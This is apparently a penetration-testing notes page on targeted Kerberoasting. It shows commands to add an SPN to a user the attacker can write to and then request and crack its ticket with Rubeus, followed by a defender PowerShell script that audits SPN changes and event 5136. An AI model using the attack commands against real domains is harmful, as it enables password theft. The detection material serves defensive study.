Set SPN
This action requires GenericWrite or GenericAll privileges on the user object.
The concept is the same as for Kerberoasting. Since that attack requires the account to have an SPN, we can add a Service Principal Name to the target user ourselves; the only constraint is that the SPN must be unique across the whole forest. We can then request a service ticket for that SPN and attempt to crack it offline to recover the account's password. However, this can be detected, because the ticket is requested for a service that does not actually exist.
Get all users with an SPN set
{% code title="PowerShell AD module" %}
Get-ADUser -Filter 'ServicePrincipalName -ne "$null"' -Properties ServicePrincipalName | Select-Object SamAccountName, ServicePrincipalName
{% endcode %}
Check if a user already has an SPN set using setspn.exe
{% code title="CMD.exe" %}
setspn.exe -L <SamAccountName>
{% endcode %}
Set an SPN for a user
{% code title="PowerShell AD Module" %}
Set-ADUser -Identity <SamAccountName> -ServicePrincipalName @{Add='<service>/<host>'}
{% endcode %}
Set an SPN for a user using setspn.exe (the -S switch first checks that the SPN is not already in use in the forest)
{% code title="CMD.exe" %}
setspn.exe -S <service>/<host> <SamAccountName>
{% endcode %}
Now that the user has an SPN, we can execute Kerberoasting against it.
{% code title="Rubeus.exe" %}
Rubeus.exe kerberoast /user:<SamAccountName>
{% endcode %}
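The detection point made above can be turned into a concrete audit. The following script is an added defender-side example, not part of the original page or of Rubeus; it lists user accounts whose servicePrincipalName attribute was written recently (using the replication metadata the DC keeps for every attribute) and pulls the matching Security event 5136 "directory service object modified" records that show who added the SPN. It assumes the ActiveDirectory module is installed, that the running account can read replication metadata on the DC, and that "Audit Directory Service Changes" together with a Write Property SACL on user objects is enabled, since otherwise no 5136 events exist. The DC name and the 24-hour lookback are parameters you can override.

```powershell
# Added example (not from the original page): audit recent servicePrincipalName
# writes on user objects, the footprint of adding an SPN to a user for
# targeted Kerberoasting.
param(
    # Assumption: the PDC emulator is reachable and readable by this account.
    [string]$DomainController = [string](Get-ADDomainController -Discover -Service PrimaryDC).HostName,
    [int]$LookbackHours = 24
)

Import-Module ActiveDirectory
$since = (Get-Date).AddHours(-$LookbackHours)

# 1. Every user that currently carries an SPN, with the time the attribute was
#    last changed according to replication metadata. A user (not a service
#    account) whose SPN was written recently is the case worth reviewing.
$spnUsers = Get-ADUser -Filter 'ServicePrincipalName -ne "$null"' `
    -Properties servicePrincipalName -Server $DomainController

$recentlyTagged = foreach ($u in $spnUsers) {
    $meta = Get-ADReplicationAttributeMetadata -Object $u.DistinguishedName `
        -Server $DomainController -Properties servicePrincipalName
    if ($meta.LastOriginatingChangeTime -ge $since) {
        [pscustomobject]@{
            SamAccountName = $u.SamAccountName
            SPNs           = ($u.servicePrincipalName -join '; ')
            SpnLastChanged = $meta.LastOriginatingChangeTime
            ChangedFromDC  = $meta.LastOriginatingChangeDirectoryServerIdentity
        }
    }
}

# 2. Security event 5136 on the DC, filtered to additions of the
#    servicePrincipalName attribute. OperationType %%14674 means "Value Added".
$events = Get-WinEvent -ComputerName $DomainController -FilterHashtable @{
    LogName   = 'Security'
    Id        = 5136
    StartTime = $since
} -ErrorAction SilentlyContinue

$spnWrites = foreach ($e in $events) {
    $x = [xml]$e.ToXml()
    $d = @{}
    foreach ($n in $x.Event.EventData.Data) { $d[$n.Name] = $n.'#text' }
    if ($d.AttributeLDAPDisplayName -eq 'servicePrincipalName' -and $d.OperationType -eq '%%14674') {
        [pscustomobject]@{
            Time     = $e.TimeCreated
            Actor    = "$($d.SubjectDomainName)\$($d.SubjectUserName)"
            TargetDN = $d.ObjectDN
            SpnAdded = $d.AttributeValue
        }
    }
}

"== Users whose SPN attribute changed in the last $LookbackHours h =="
$recentlyTagged | Format-Table -AutoSize
"== 5136 events adding an SPN in the last $LookbackHours h =="
$spnWrites | Format-Table -AutoSize
```

Run it from a machine with RSAT as an account that can read the DC's Security log; correlating the actor in the 5136 record with the account named in the SPN write, and then with the service ticket requests (event 4769) for that SPN shortly afterwards, is what separates an administrator registering a real service from the pattern this page describes.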